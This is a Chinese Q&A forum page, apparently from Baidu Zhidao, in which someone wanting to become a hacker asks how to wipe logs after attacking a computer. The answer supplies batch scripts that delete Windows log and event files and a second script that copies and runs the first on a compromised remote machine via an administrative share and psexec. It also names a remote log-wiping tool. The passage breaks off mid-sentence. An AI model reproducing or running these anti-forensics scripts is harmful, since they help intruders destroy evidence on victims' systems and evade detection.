用黑客工具攻击一个电脑后,要清除日志,给位大哥帮小弟解释以下,怎么是清除日志?

来源:百度知道 编辑:UC知道 时间:2024/05/19 21:23:09
小弟我想学习一下黑客技术,但是我知道黑客是做什么的?黑客也有黑客的素质,我想做一个出色的黑客`希望各位前辈高手多教教我` 我的QQ是544735125。

入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:

@del c:\winnt\system32\logfiles\*.*
@del c:\winnt\system32\config\*.evt
@del c:\winnt\system32\dtclog\*.*
@del c:\winnt\system32\*.log
@del c:\winnt\system32\*.txt
@del c:\winnt\*.txt
@del c:\winnt\*.log
@del c:\del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。

接下来再新建一个批处理文件,内容如下:

@copy del.bat \\%1\c$
@echo 向肉鸡复制本机的del.bat……OK
@psexec \\%1 c:\del.bat
@echo 在肉鸡上运行del.bat,清除日志文件……OK

保存为clean.bat即可,假设已经与肉鸡进行了IPC连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建